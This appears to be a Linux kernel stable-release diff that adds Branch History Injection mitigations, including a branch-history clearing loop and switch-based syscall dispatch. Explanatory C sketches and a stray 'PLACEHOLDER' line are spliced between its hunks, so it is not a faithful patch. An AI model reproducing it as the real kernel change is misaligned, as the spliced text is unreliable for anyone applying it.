+ Attack scenarios
+ ----------------
+@@ -430,6 +429,23 @@ The possible values in this file are:
+   'PBRSB-eIBRS: Not affected'  CPU is not affected by PBRSB
+   ===========================  =======================================================
+ 
++  - Branch History Injection (BHI) protection status:
++
++.. list-table::
++
++ * - BHI: Not affected
++   - System is not affected
++ * - BHI: Retpoline
++   - System is protected by retpoline
++ * - BHI: BHI_DIS_S
++   - System is protected by BHI_DIS_S
++ * - BHI: SW loop; KVM SW loop
++   - System is protected by software clearing sequence
++ * - BHI: Syscall hardening
++   - Syscalls are hardened against BHI
++ * - BHI: Syscall hardening; KVM: SW loop
++   - System is protected from userspace attacks by syscall hardening; KVM is protected by software clearing sequence
++
+ Full mitigation might require a microcode update from the CPU
+ vendor. When the necessary microcode is not available, the kernel will
+ report vulnerability.
+@@ -484,7 +500,11 @@ Spectre variant 2
+ 
+    Systems which support enhanced IBRS (eIBRS) enable IBRS protection once at
+    boot, by setting the IBRS bit, and they're automatically protected against
+-   Spectre v2 variant attacks.
++   some Spectre v2 variant attacks. The BHB can still influence the choice of
++   indirect branch predictor entry, and although branch predictor entries are
++   isolated between modes when eIBRS is enabled, the BHB itself is not isolated
++   between modes. Systems which support BHI_DIS_S will set it to protect against
++   BHI attacks.
+ 
+    On Intel's enhanced IBRS systems, this includes cross-thread branch target
+    injections on SMT systems (STIBP). In other words, Intel eIBRS enables
+@@ -638,6 +658,22 @@ kernel command line.
+ 		spectre_v2=off. Spectre variant 1 mitigations
+ 		cannot be disabled.
+ 
++	spectre_bhi=
++
++		[X86] Control mitigation of Branch History Injection
++		(BHI) vulnerability. Syscalls are hardened against BHI
++		regardless of this setting. This setting affects the deployment
++		of the HW BHI control and the SW BHB clearing sequence.
++
++		on
++			unconditionally enable.
++		off
++			unconditionally disable.
++		auto
++			enable if hardware mitigation
++			control(BHI_DIS_S) is available, otherwise
++			enable alternate mitigation in KVM.
++
+ For spectre_v2_user see Documentation/admin-guide/kernel-parameters.txt
+ 
+ Mitigation selection guide
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 88dffaf8f0a99..b2c7b2f012e90 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5733,6 +5733,18 @@
+ 	sonypi.*=	[HW] Sony Programmable I/O Control Device driver
+ 			See Documentation/admin-guide/laptops/sonypi.rst
+ 
++	spectre_bhi=	[X86] Control mitigation of Branch History Injection
++			(BHI) vulnerability. Syscalls are hardened against BHI
++			regardless of this setting. This setting affects the
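PLACEHOLDER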
++			deployment of the HW BHI control and the SW BHB
++			clearing sequence.
++
++			on   - unconditionally enable.
++			off  - unconditionally disable.
++			auto - (default) enable hardware mitigation
++			       (BHI_DIS_S) if available, otherwise enable
++			       alternate mitigation in KVM.
++
+ 	spectre_v2=	[X86] Control mitigation of Spectre variant 2
+ 			(indirect branch speculation) vulnerability.
+ 			The default operation protects the kernel from
+diff --git a/Makefile b/Makefile
+index 0e33150db2bfc..5dff9ff999981 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 84
++SUBLEVEL = 85
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor.dtsi b/arch/arm64/boot/dts/qcom/sc7180-trogdor.dtsi
+index eae22e6e97c15..f55ce6f2fdc28 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor.dtsi
+@@ -923,6 +923,8 @@ bluetooth: bluetooth {
+ 		vddrf-supply = <&pp1300_l2c>;
+ 		vddch0-supply = <&pp3300_l10c>;
+ 		max-speed = <3200000>;
++
++		qcom,local-bd-address-broken;
+ 	};
+ };
+ 
+diff --git a/arch/riscv/include/asm/uaccess.h b/arch/riscv/include/asm/uaccess.h
+index ec0cab9fbddd0..72ec1d9bd3f31 100644
+--- a/arch/riscv/include/asm/uaccess.h
++++ b/arch/riscv/include/asm/uaccess.h
+@@ -319,7 +319,7 @@ unsigned long __must_check clear_user(void __user *to, unsigned long n)
+ 
+ #define __get_kernel_nofault(dst, src, type, err_label)			\
+ do {									\
+-	long __kr_err;							\
++	long __kr_err = 0;						\
+ 									\
+ 	__get_user_nocheck(*((type *)(dst)), (type *)(src), __kr_err);	\
+ 	if (unlikely(__kr_err))						\
+@@ -328,7 +328,7 @@ do {									\
+ 
+ #define __put_kernel_nofault(dst, src, type, err_label)			\
+ do {									\
+-	long __kr_err;							\
++	long __kr_err = 0;						\
+ 									\
+ 	__put_user_nocheck(*((type *)(src)), (type *)(dst), __kr_err);	\
+ 	if (unlikely(__kr_err))						\
+diff --git a/arch/riscv/kernel/process.c b/arch/riscv/kernel/process.c
+index 8955f2432c2d8..6906cc0e57875 100644
+--- a/arch/riscv/kernel/process.c
++++ b/arch/riscv/kernel/process.c
+@@ -25,8 +25,6 @@
+ #include <asm/thread_info.h>
+ #include <asm/cpuidle.h>
+ 
+-register unsigned long gp_in_global __asm__("gp");
+-
+ #if defined(CONFIG_STACKPROTECTOR) && !defined(CONFIG_STACKPROTECTOR_PER_TASK)
+ #include <linux/stackprotector.h>
+ unsigned long __stack_chk_guard __read_mostly;
+@@ -170,7 +168,6 @@ int copy_thread(struct task_struct *p, const struct kernel_clone_args *args)
+ 	if (unlikely(args->fn)) {
+ 		/* Kernel thread */
+ 		memset(childregs, 0, sizeof(struct pt_regs));
+-		childregs->gp = gp_in_global;
+ 		/* Supervisor/Machine, irqs on: */
+ 		childregs->status = SR_PP | SR_PIE;
+ 
+diff --git a/arch/s390/kernel/entry.S b/arch/s390/kernel/entry.S
+index d2a1f2f4f5b88..c9799dec92793 100644
+--- a/arch/s390/kernel/entry.S
++++ b/arch/s390/kernel/entry.S
+@@ -699,6 +699,7 @@ ENDPROC(stack_overflow)
+ .Lthis_cpu:	.short	0
+ .Lstosm_tmp:	.byte	0
+ 	.section .rodata, "a"
++	.balign	8
+ #define SYSCALL(esame,emu)	.quad __s390x_ ## esame
+ 	.globl	sys_call_table
+ sys_call_table:
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index bea53385d31e3..ba815ac474a1b 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -2563,6 +2563,31 @@ config MITIGATION_RFDS
+ 	  stored in floating point, vector and integer registers.
+ 	  See also <file:Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst>
+ 
++choice
++	prompt "Clear branch history"
++	depends on CPU_SUP_INTEL
++	default SPECTRE_BHI_ON
++	help
++	  Enable BHI mitigations. BHI attacks are a form of Spectre V2 attacks
++	  where the branch history buffer is poisoned to speculatively steer
++	  indirect branches.
++	  See <file:Documentation/admin-guide/hw-vuln/spectre.rst>
++
++config SPECTRE_BHI_ON
++	bool "on"
++	help
++	  Equivalent to setting spectre_bhi=on command line parameter.
++config SPECTRE_BHI_OFF
++	bool "off"
++	help
++	  Equivalent to setting spectre_bhi=off command line parameter.
++config SPECTRE_BHI_AUTO
++	bool "auto"
++	help
++	  Equivalent to setting spectre_bhi=auto command line parameter.
++
++endchoice
++
+ endif
+ 
+ config ARCH_HAS_ADD_PAGES
+diff --git a/arch/x86/coco/core.c b/arch/x86/coco/core.c
+index 1d3ad275c3664..801e943fd2b29 100644
+--- a/arch/x86/coco/core.c
++++ b/arch/x86/coco/core.c
+@@ -3,13 +3,17 @@
+  * Confidential Computing Platform Capability checks
+  *
+  * Copyright (C) 2021 Advanced Micro Devices, Inc.
++ * Copyright (C) 2024 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+  *
+  * Author: Tom Lendacky <thomas.lendacky@amd.com>
+  */
+ 
+ #include <linux/export.h>
+ #include <linux/cc_platform.h>
++#include <linux/string.h>
++#include <linux/random.h>
+ 
++#include <asm/archrandom.h>
+ #include <asm/coco.h>
+ #include <asm/processor.h>
+ 
+@@ -128,3 +132,40 @@ u64 cc_mkdec(u64 val)
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(cc_mkdec);
++
++__init void cc_random_init(void)
++{
++	/*
++	 * The seed is 32 bytes (in units of longs), which is 256 bits, which
++	 * is the security level that the RNG is targeting.
++	 */
++	unsigned long rng_seed[32 / sizeof(long)];
++	size_t i, longs;
++
++	if (!cc_platform_has(CC_ATTR_GUEST_MEM_ENCRYPT))
++		return;
++
++	/*
++	 * Since the CoCo threat model includes the host, the only reliable
++	 * source of entropy that can be neither observed nor manipulated is
++	 * RDRAND. Usually, RDRAND failure is considered tolerable, but since
++	 * CoCo guests have no other unobservable source of entropy, it's
++	 * important to at least ensure the RNG gets some initial random seeds.
++	 */
++	for (i = 0; i < ARRAY_SIZE(rng_seed); i += longs) {
++		longs = arch_get_random_longs(&rng_seed[i], ARRAY_SIZE(rng_seed) - i);
++
++		/*
++		 * A zero return value means that the guest doesn't have RDRAND
++		 * or the CPU is physically broken, and in both cases that
++		 * means most crypto inside of the CoCo instance will be
++		 * broken, defeating the purpose of CoCo in the first place. So
++		 * just panic here because it's absolutely unsafe to continue
++		 * executing.
++		 */
++		if (longs == 0)
++			panic("RDRAND is defective.");
++	}
++	add_device_randomness(rng_seed, sizeof(rng_seed));
++	memzero_explicit(rng_seed, sizeof(rng_seed));
++}
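
A userspace sketch of the same seeding idea: pull the full 256 bits straight from RDRAND, treat persistent failure as fatal, and wipe the seed afterwards. This is x86-64 only (build with -mrdrnd); the explicit retry loop is an assumption added here, since in the kernel arch_get_random_longs() handles retries internally, and memset() below may be optimized away where the kernel's memzero_explicit() may not:

/* Build: cc -mrdrnd rdrand_seed.c (x86-64 only). */
#include <immintrin.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
	unsigned long long seed[32 / sizeof(unsigned long long)];
	size_t i;
	int tries;

	for (i = 0; i < sizeof(seed) / sizeof(seed[0]); i++) {
		for (tries = 0; tries < 10; tries++)
			if (_rdrand64_step(&seed[i]))
				break;
		if (tries == 10) {
			/* no other unobservable entropy source: give up */
			fprintf(stderr, "RDRAND is defective.\n");
			exit(1);
		}
	}
	printf("collected %zu seed bytes\n", sizeof(seed));

	memset(seed, 0, sizeof(seed));
	return 0;
}
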
+diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
+index 9c0b26ae51069..e72dac092245a 100644
+--- a/arch/x86/entry/common.c
++++ b/arch/x86/entry/common.c
+@@ -48,7 +48,7 @@ static __always_inline bool do_syscall_x64(struct pt_regs *regs, int nr)
+ 
+ 	if (likely(unr < NR_syscalls)) {
+ 		unr = array_index_nospec(unr, NR_syscalls);
+-		regs->ax = sys_call_table[unr](regs);
++		regs->ax = x64_sys_call(regs, unr);
+ 		return true;
+ 	}
+ 	return false;
+@@ -65,7 +65,7 @@ static __always_inline bool do_syscall_x32(struct pt_regs *regs, int nr)
+ 
+ 	if (IS_ENABLED(CONFIG_X86_X32_ABI) && likely(xnr < X32_NR_syscalls)) {
+ 		xnr = array_index_nospec(xnr, X32_NR_syscalls);
+-		regs->ax = x32_sys_call_table[xnr](regs);
++		regs->ax = x32_sys_call(regs, xnr);
+ 		return true;
+ 	}
+ 	return false;
+@@ -114,7 +114,7 @@ static __always_inline void do_syscall_32_irqs_on(struct pt_regs *regs, int nr)
+ 
+ 	if (likely(unr < IA32_NR_syscalls)) {
+ 		unr = array_index_nospec(unr, IA32_NR_syscalls);
+-		regs->ax = ia32_sys_call_table[unr](regs);
++		regs->ax = ia32_sys_call(regs, unr);
+ 	} else if (nr != -1) {
+ 		regs->ax = __ia32_sys_ni_syscall(regs);
+ 	}
+@@ -141,7 +141,7 @@ static __always_inline bool int80_is_external(void)
+ }
+ 
+ /**
+- * int80_emulation - 32-bit legacy syscall entry
++ * do_int80_emulation - 32-bit legacy syscall C entry from asm
+  *
+  * This entry point can be used by 32-bit and 64-bit programs to perform
+  * 32-bit system calls.  Instances of INT $0x80 can be found inline in
+@@ -159,7 +159,7 @@ static __always_inline bool int80_is_external(void)
+  *   eax:				system call number
+  *   ebx, ecx, edx, esi, edi, ebp:	arg1 - arg 6
+  */
+-DEFINE_IDTENTRY_RAW(int80_emulation)
++__visible noinstr void do_int80_emulation(struct pt_regs *regs)
+ {
+ 	int nr;
+ 
+diff --git a/arch/x86/entry/entry_64.S b/arch/x86/entry/entry_64.S
+index c2383c2880ec6..6624806e6904b 100644
+--- a/arch/x86/entry/entry_64.S
++++ b/arch/x86/entry/entry_64.S
+@@ -116,6 +116,7 @@ SYM_INNER_LABEL(entry_SYSCALL_64_after_hwframe, SYM_L_GLOBAL)
+ 	/* clobbers %rax, make sure it is after saving the syscall nr */
+ 	IBRS_ENTER
+ 	UNTRAIN_RET
++	CLEAR_BRANCH_HISTORY
+ 
+ 	call	do_syscall_64		/* returns with IRQs disabled */
+ 
+@@ -1539,3 +1540,63 @@ SYM_CODE_START(rewind_stack_and_make_dead)
+ 	call	make_task_dead
+ SYM_CODE_END(rewind_stack_and_make_dead)
+ .popsection
++
++/*
++ * This sequence executes branches in order to remove user branch information
++ * from the branch history tracker in the Branch Predictor, therefore removing
++ * user influence on subsequent BTB lookups.
++ *
++ * It should be used on parts prior to Alder Lake. Newer parts should use the
++ * BHI_DIS_S hardware control instead. If a pre-Alder Lake part is being
++ * virtualized on newer hardware the VMM should protect against BHI attacks by
++ * setting BHI_DIS_S for the guests.
++ *
++ * CALLs/RETs are necessary to prevent the Loop Stream Detector (LSD) from engaging
++ * and not clearing the branch history. The call tree looks like:
++ *
++ * call 1
++ *   call 2
++ *     call 2
++ *       call 2
++ *         call 2
++ *           call 2
++ *           ret
++ *         ret
++ *       ret
++ *     ret
++ *   ret
++ * ret
++ *
++ * This means that the stack is non-constant and ORC can't unwind it with %rsp
++ * alone.  Therefore we unconditionally set up the frame pointer, which allows
++ * ORC to unwind properly.
++ *
++ * The alignment is for performance and not for safety, and may be safely
++ * refactored in the future if needed.
++ */
++SYM_FUNC_START(clear_bhb_loop)
++	push	%rbp
++	mov	%rsp, %rbp
++	movl	$5, %ecx
++	ANNOTATE_INTRA_FUNCTION_CALL
++	call	1f
++	jmp	5f
++	.align 64, 0xcc
++	ANNOTATE_INTRA_FUNCTION_CALL
++1:	call	2f
++	RET
++	.align 64, 0xcc
++2:	movl	$5, %eax
++3:	jmp	4f
++	nop
++4:	sub	$1, %eax
++	jnz	3b
++	sub	$1, %ecx
++	jnz	1b
++	RET
++5:	lfence
++	pop	%rbp
++	RET
++SYM_FUNC_END(clear_bhb_loop)
++EXPORT_SYMBOL_GPL(clear_bhb_loop)
++STACK_FRAME_NON_STANDARD(clear_bhb_loop)
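
As a rough standalone model of the call tree in the comment above (an
assumption-laden sketch: the counts mirror %ecx/%eax in the asm, and every
CALL, RET and taken jump is tallied as one branch event; it is not an exact
branch count):

#include <stdio.h>

static unsigned long branches;	/* emulated taken-branch events */

/*
 * Rough model of labels 1/2 above: each level runs the 5-iteration
 * inner jump loop, then either re-enters one CALL deeper (jnz 1b
 * followed by another call 2f) or starts unwinding the chain of
 * pending RETs.
 */
static void level(int ecx)
{
	int eax;

	branches++;			/* the CALL into this level */
	for (eax = 5; eax; eax--)
		branches += 2;		/* jmp 4f and jnz 3b */
	if (ecx > 1)
		level(ecx - 1);
	branches++;			/* the RET out of this level */
}

int main(void)
{
	level(5);			/* %ecx = 5 in the asm */
	printf("~%lu taken branches stuffed into the BHB\n", branches);
	return 0;
}
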
+diff --git a/arch/x86/entry/entry_64_compat.S b/arch/x86/entry/entry_64_compat.S
+index 4bcd009a232bf..b14b8cd85eb23 100644
+--- a/arch/x86/entry/entry_64_compat.S
++++ b/arch/x86/entry/entry_64_compat.S
+@@ -92,6 +92,7 @@ SYM_INNER_LABEL(entry_SYSENTER_compat_after_hwframe, SYM_L_GLOBAL)
+ 
+ 	IBRS_ENTER
+ 	UNTRAIN_RET
++	CLEAR_BRANCH_HISTORY
+ 
+ 	/*
+ 	 * SYSENTER doesn't filter flags, so we need to clear NT and AC
+@@ -210,6 +211,7 @@ SYM_INNER_LABEL(entry_SYSCALL_compat_after_hwframe, SYM_L_GLOBAL)
+ 
+ 	IBRS_ENTER
+ 	UNTRAIN_RET
++	CLEAR_BRANCH_HISTORY
+ 
+ 	movq	%rsp, %rdi
+ 	call	do_fast_syscall_32
+@@ -278,3 +280,17 @@ SYM_INNER_LABEL(entry_SYSRETL_compat_end, SYM_L_GLOBAL)
+ 	ANNOTATE_NOENDBR
+ 	int3
+ SYM_CODE_END(entry_SYSCALL_compat)
++
++/*
++ * int 0x80 is used by 32-bit mode as a system call entry. Normally, IDT
++ * entries point to C routines, but since this is a system call interface the
++ * branch history needs to be scrubbed to protect against BHI attacks, and
++ * that scrubbing needs to take place in assembly code prior to entering any
++ * C routines.
++ */
++SYM_CODE_START(int80_emulation)
++	ANNOTATE_NOENDBR
++	UNWIND_HINT_FUNC
++	CLEAR_BRANCH_HISTORY
++	jmp do_int80_emulation
++SYM_CODE_END(int80_emulation)
+diff --git a/arch/x86/entry/syscall_32.c b/arch/x86/entry/syscall_32.c
+index 8cfc9bc73e7f8..c2235bae17ef6 100644
+--- a/arch/x86/entry/syscall_32.c
++++ b/arch/x86/entry/syscall_32.c
+@@ -18,8 +18,25 @@
+ #include <asm/syscalls_32.h>
+ #undef __SYSCALL
+ 
++/*
++ * The sys_call_table[] is no longer used for system calls, but
++ * kernel/trace/trace_syscalls.c still wants to know the system
++ * call address.
++ */
++#ifdef CONFIG_X86_32
+ #define __SYSCALL(nr, sym) __ia32_##sym,
+-
+-__visible const sys_call_ptr_t ia32_sys_call_table[] = {
++const sys_call_ptr_t sys_call_table[] = {
+ #include <asm/syscalls_32.h>
+ };
++#undef __SYSCALL
++#endif
++
++#define __SYSCALL(nr, sym) case nr: return __ia32_##sym(regs);
++
++long ia32_sys_call(const struct pt_regs *regs, unsigned int nr)
++{
++	switch (nr) {
++	#include <asm/syscalls_32.h>
++	default: return __ia32_sys_ni_syscall(regs);
++	}
++};
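
The trick above relies on asm/syscalls_32.h being nothing but a list of
__SYSCALL(nr, sym) lines, so redefining __SYSCALL before each inclusion
expands the same list either into table initializers or into switch cases;
the switch replaces the attacker-steerable indirect call with direct
branches. A self-contained toy sketch of the same macro technique
(TOY_SYSCALLS, sys_hello and this struct pt_regs are invented for the demo):

#include <stdio.h>

struct pt_regs { long di; };	/* toy stand-in for the real struct */

static long sys_hello(const struct pt_regs *regs)
{
	return printf("hello %ld\n", regs->di);
}

static long sys_ni_syscall(const struct pt_regs *regs)
{
	(void)regs;
	return -38;	/* -ENOSYS */
}

/* Toy version of asm/syscalls_32.h: one __SYSCALL() line per entry. */
#define TOY_SYSCALLS \
	__SYSCALL(0, sys_hello)

/* Expansion 1: a function-pointer table (the old, indirect dispatch). */
#define __SYSCALL(nr, sym) [nr] = sym,
static long (*const toy_table[])(const struct pt_regs *) = { TOY_SYSCALLS };
#undef __SYSCALL

/* Expansion 2: direct calls via switch (the BHI-hardened dispatch). */
#define __SYSCALL(nr, sym) case nr: return sym(regs);
static long toy_sys_call(const struct pt_regs *regs, unsigned int nr)
{
	switch (nr) {
	TOY_SYSCALLS
	default: return sys_ni_syscall(regs);
	}
}
#undef __SYSCALL

int main(void)
{
	struct pt_regs regs = { .di = 42 };

	toy_table[0](&regs);			/* indirect branch */
	return (int)toy_sys_call(&regs, 0);	/* direct branches only */
}
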
+diff --git a/arch/x86/entry/syscall_64.c b/arch/x86/entry/syscall_64.c
+index be120eec1fc9f..33b3f09e6f151 100644
+--- a/arch/x86/entry/syscall_64.c
++++ b/arch/x86/entry/syscall_64.c
+@@ -11,8 +11,23 @@
+ #include <asm/syscalls_64.h>
+ #undef __SYSCALL
+ 
++/*
++ * The sys_call_table[] is no longer used for system calls, but
++ * kernel/trace/trace_syscalls.c still wants to know the system
++ * call address.
++ */
+ #define __SYSCALL(nr, sym) __x64_##sym,
+-
+-asmlinkage const sys_call_ptr_t sys_call_table[] = {
++const sys_call_ptr_t sys_call_table[] = {
+ #include <asm/syscalls_64.h>
+ };
++#undef __SYSCALL
++
++#define __SYSCALL(nr, sym) case nr: return __x64_##sym(regs);
++
++long x64_sys_call(const struct pt_regs *regs, unsigned int nr)
++{
++	switch (nr) {
++	#include <asm/syscalls_64.h>
++	default: return __x64_sys_ni_syscall(regs);
++	}
++};
+diff --git a/arch/x86/entry/syscall_x32.c b/arch/x86/entry/syscall_x32.c
+index bdd0e03a1265d..03de4a9321318 100644
+--- a/arch/x86/entry/syscall_x32.c
++++ b/arch/x86/entry/syscall_x32.c
+@@ -11,8 +11,12 @@
+ #include <asm/syscalls_x32.h>
+ #undef __SYSCALL
+ 
+-#define __SYSCALL(nr, sym) __x64_##sym,
++#define __SYSCALL(nr, sym) case nr: return __x64_##sym(regs);
+ 
+-asmlinkage const sys_call_ptr_t x32_sys_call_table[] = {
+-#include <asm/syscalls_x32.h>
++long x32_sys_call(const struct pt_regs *regs, unsigned int nr)
++{
++	switch (nr) {
++	#include <asm/syscalls_x32.h>
++	default: return __x64_sys_ni_syscall(regs);
++	}
+ };
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index fd091b9dd7067..3ac069a4559b0 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -904,8 +904,8 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 	if (!status)
+ 		goto done;
+ 
+-	/* Read branch records before unfreezing */
+-	if (status & GLOBAL_STATUS_LBRS_FROZEN) {
++	/* Read branch records */
++	if (x86_pmu.lbr_nr) {
+ 		amd_pmu_lbr_read();
+ 		status &= ~GLOBAL_STATUS_LBRS_FROZEN;
+ 	}
+diff --git a/arch/x86/events/amd/lbr.c b/arch/x86/events/amd/lbr.c
+index 38a75216c12cf..b8fe74e8e0a60 100644
+--- a/arch/x86/events/amd/lbr.c
++++ b/arch/x86/events/amd/lbr.c
+@@ -400,10 +400,12 @@ void amd_pmu_lbr_enable_all(void)
+ 		wrmsrl(MSR_AMD64_LBR_SELECT, lbr_select);
+ 	}
+ 
+-	rdmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl);
+-	rdmsrl(MSR_AMD_DBG_EXTN_CFG, dbg_extn_cfg);
++	if (cpu_feature_enabled(X86_FEATURE_AMD_LBR_PMC_FREEZE)) {
++		rdmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl);
++		wrmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI);
++	}
+ 
+-	wrmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI);
++	rdmsrl(MSR_AMD_DBG_EXTN_CFG, dbg_extn_cfg);
+ 	wrmsrl(MSR_AMD_DBG_EXTN_CFG, dbg_extn_cfg | DBG_EXTN_CFG_LBRV2EN);
+ }
+ 
+@@ -416,10 +418,12 @@ void amd_pmu_lbr_disable_all(void)
+ 		return;
+ 
+ 	rdmsrl(MSR_AMD_DBG_EXTN_CFG, dbg_extn_cfg);
+-	rdmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl);
+-
+ 	wrmsrl(MSR_AMD_DBG_EXTN_CFG, dbg_extn_cfg & ~DBG_EXTN_CFG_LBRV2EN);
+-	wrmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl & ~DEBUGCTLMSR_FREEZE_LBRS_ON_PMI);
++
++	if (cpu_feature_enabled(X86_FEATURE_AMD_LBR_PMC_FREEZE)) {
++		rdmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl);
++		wrmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl & ~DEBUGCTLMSR_FREEZE_LBRS_ON_PMI);
++	}
+ }
+ 
+ __init int amd_pmu_lbr_init(void)
+diff --git a/arch/x86/include/asm/asm-prototypes.h b/arch/x86/include/asm/asm-prototypes.h
+index 8f80de627c60a..5cdccea455544 100644
+--- a/arch/x86/include/asm/asm-prototypes.h
++++ b/arch/x86/include/asm/asm-prototypes.h
+@@ -12,6 +12,7 @@
+ #include <asm/special_insns.h>
+ #include <asm/preempt.h>
+ #include <asm/asm.h>
++#include <asm/nospec-branch.h>
+ 
+ #ifndef CONFIG_X86_CMPXCHG64
+ extern void cmpxchg8b_emu(void);
+diff --git a/arch/x86/include/asm/coco.h b/arch/x86/include/asm/coco.h
+index 60bb26097da1a..1f97d00ad8588 100644
+--- a/arch/x86/include/asm/coco.h
++++ b/arch/x86/include/asm/coco.h
+@@ -23,6 +23,7 @@ static inline void cc_set_mask(u64 mask)
+ 
+ u64 cc_mkenc(u64 val);
+ u64 cc_mkdec(u64 val);
++void cc_random_init(void);
+ #else
+ static inline u64 cc_mkenc(u64 val)
+ {
+@@ -33,6 +34,7 @@ static inline u64 cc_mkdec(u64 val)
+ {
+ 	return val;
+ }
++static inline void cc_random_init(void) { }
+ #endif
+ 
+ #endif /* _ASM_X86_COCO_H */
+diff --git a/arch/x86/include/asm/cpufeature.h b/arch/x86/include/asm/cpufeature.h
+index f835b328ba24f..16051c6f3b13d 100644
+--- a/arch/x86/include/asm/cpufeature.h
++++ b/arch/x86/include/asm/cpufeature.h
+@@ -33,6 +33,8 @@ enum cpuid_leafs
+ 	CPUID_7_EDX,
+ 	CPUID_8000_001F_EAX,
+ 	CPUID_8000_0021_EAX,
++	CPUID_LNX_5,
++	NR_CPUID_WORDS,
+ };
+ 
+ #define X86_CAP_FMT_NUM "%d:%d"
+@@ -96,8 +98,9 @@ extern const char * const x86_bug_flags[NBUGINTS*32];
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 18, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 19, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 20, feature_bit) ||	\
++	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 21, feature_bit) ||	\
+ 	   REQUIRED_MASK_CHECK					  ||	\
+-	   BUILD_BUG_ON_ZERO(NCAPINTS != 21))
++	   BUILD_BUG_ON_ZERO(NCAPINTS != 22))
+ 
+ #define DISABLED_MASK_BIT_SET(feature_bit)				\
+ 	 ( CHECK_BIT_IN_MASK_WORD(DISABLED_MASK,  0, feature_bit) ||	\
+@@ -121,8 +124,9 @@ extern const char * const x86_bug_flags[NBUGINTS*32];
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 18, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 19, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 20, feature_bit) ||	\
++	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 21, feature_bit) ||	\
+ 	   DISABLED_MASK_CHECK					  ||	\
+-	   BUILD_BUG_ON_ZERO(NCAPINTS != 21))
++	   BUILD_BUG_ON_ZERO(NCAPINTS != 22))
+ 
+ #define cpu_has(c, bit)							\
+ 	(__builtin_constant_p(bit) && REQUIRED_MASK_BIT_SET(bit) ? 1 :	\
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index 9a157942ae3dd..7ded926724147 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -13,7 +13,7 @@
+ /*
+  * Defines x86 CPU feature bits
+  */
+-#define NCAPINTS			21	   /* N 32-bit words worth of info */
++#define NCAPINTS			22	   /* N 32-bit words worth of info */
+ #define NBUGINTS			2	   /* N 32-bit bug flags */
+ 
+ /*
+@@ -432,6 +432,18 @@
+ #define X86_FEATURE_IBPB_BRTYPE		(20*32+28) /* "" MSR_PRED_CMD[IBPB] flushes all branch type predictions */
+ #define X86_FEATURE_SRSO_NO		(20*32+29) /* "" CPU is not affected by SRSO */
+ 
++/*
++ * Extended auxiliary flags: Linux defined - for features scattered in various
++ * CPUID levels like 0x80000022, etc and Linux defined features.
++ *
++ * Reuse free bits when adding new feature flags!
++ */
++#define X86_FEATURE_AMD_LBR_PMC_FREEZE	(21*32+ 0) /* AMD LBR and PMC Freeze */
++#define X86_FEATURE_CLEAR_BHB_LOOP	(21*32+ 1) /* "" Clear branch history at syscall entry using SW loop */
++#define X86_FEATURE_BHI_CTRL		(21*32+ 2) /* "" BHI_DIS_S HW control available */
++#define X86_FEATURE_CLEAR_BHB_HW	(21*32+ 3) /* "" BHI_DIS_S HW control enabled */
++#define X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT (21*32+ 4) /* "" Clear branch history at vmexit using SW loop */
++
+ /*
+  * BUG word(s)
+  */
+@@ -479,4 +491,5 @@
+ #define X86_BUG_SRSO			X86_BUG(1*32 + 0) /* AMD SRSO bug */
+ #define X86_BUG_DIV0			X86_BUG(1*32 + 1) /* AMD DIV0 speculation bug */
+ #define X86_BUG_RFDS			X86_BUG(1*32 + 2) /* CPU is vulnerable to Register File Data Sampling */
++#define X86_BUG_BHI			X86_BUG(1*32 + 3) /* CPU is affected by Branch History Injection */
+ #endif /* _ASM_X86_CPUFEATURES_H */
+diff --git a/arch/x86/include/asm/disabled-features.h b/arch/x86/include/asm/disabled-features.h
+index 000037078db43..380e963149cc7 100644
+--- a/arch/x86/include/asm/disabled-features.h
++++ b/arch/x86/include/asm/disabled-features.h
+@@ -112,6 +112,7 @@
+ #define DISABLED_MASK18	0
+ #define DISABLED_MASK19	0
+ #define DISABLED_MASK20	0
